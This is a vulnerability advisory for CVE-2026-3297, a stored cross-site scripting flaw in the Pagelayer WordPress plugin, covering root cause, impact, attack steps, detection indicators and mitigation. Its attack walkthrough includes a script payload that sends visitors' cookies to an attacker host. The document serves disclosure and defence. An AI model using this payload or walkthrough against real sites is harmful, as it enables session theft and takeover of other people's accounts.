CVE-2026-3297: 
WordPress Analyse et atténuation des vulnérabilités

CVE-2026-3297 is a Stored Cross-Site Scripting (XSS) vulnerability in the Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress. It affects versions up to and including 2.0.9, where insufficient input sanitization and output escaping in the Anchor block allow authenticated attackers with contributor-level access or above to inject arbitrary web scripts into pages. The vulnerability was published on June 13, 2026, and assigned by Wordfence. It carries a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-site Scripting). The vulnerability exists in the Anchor block component of the Pagelayer plugin, which fails to properly sanitize user-supplied input before storing it and fails to escape it upon output rendering. An authenticated attacker with at minimum contributor-level WordPress access can craft a malicious payload within the Anchor block that is persistently stored in the database and subsequently executed in the browsers of any user who visits the affected page. No user interaction beyond page visitation is required for the payload to trigger (GitHub Advisory, Wordfence).

Successful exploitation allows injected JavaScript to execute in the browsers of all users who visit the compromised page, including administrators. This enables session cookie theft, account takeover, unauthorized actions performed on behalf of victims, and redirection to malicious external sites. The scope is marked as "Changed" in the CVSS scoring, reflecting that the impact extends beyond the attacker's own session to affect all site visitors. Availability is not directly impacted, but confidentiality and integrity are both at risk (GitHub Advisory, Wordfence).

1. Reconnaissance: Identify WordPress sites running the Pagelayer plugin version ≤ 2.0.9 using tools like WPScan or by inspecting plugin metadata in publicly accessible WordPress installations.
2. Obtain contributor access: Register or compromise a WordPress account with at least contributor-level privileges on the target site.
3. Navigate to page editor: Log in and create or edit a page using the Pagelayer drag-and-drop builder.
4. Inject payload via Anchor block: Insert a malicious JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the Anchor block field, which lacks proper input sanitization.
5. Publish or save the page: Submit the page, causing the malicious script to be stored persistently in the WordPress database.
6. Trigger execution: Any user (including administrators) who visits the affected page will have the injected script execute in their browser, enabling session hijacking, credential theft, or further malicious actions (GitHub Advisory, Wordfence).

• Logs: WordPress access logs showing POST requests to page editing endpoints (e.g., /wp-admin/post.php or REST API endpoints) from contributor-level accounts containing suspicious script tags or encoded JavaScript in the request body.
• Database: Unexpected <script> tags, JavaScript event handlers (e.g., onerror, onload), or encoded payloads stored in the wp_posts table within Pagelayer Anchor block content fields.
• Network: Outbound requests from victim browsers to unknown external domains shortly after visiting pages built with Pagelayer, potentially carrying cookie or session data in query parameters.
• File System: No direct file system artifacts expected for stored XSS; however, monitor for any newly created or modified PHP files in the Pagelayer plugin directory (/wp-content/plugins/pagelayer/) that could indicate secondary compromise.

Update the Pagelayer plugin to a version beyond 2.0.9 as soon as a patched release is available; the fix is referenced in the plugin changeset (Pagelayer Changeset). As an interim measure, restrict contributor-level and above access to only fully trusted users, and consider temporarily disabling the Pagelayer plugin on sensitive sites. Deploying a Web Application Firewall (WAF) with rules targeting script injection in page content fields can provide additional defense-in-depth (Wordfence, GitHub Advisory).

The vulnerability was assigned and disclosed by Wordfence, a leading WordPress security firm, as part of their threat intelligence program. Coverage has been picked up by standard vulnerability aggregators including VulnDB, Tenable, INCIBE, and ENISA's EUVD. No notable independent researcher commentary or significant social media discussion has been identified beyond automated CVE tracking posts.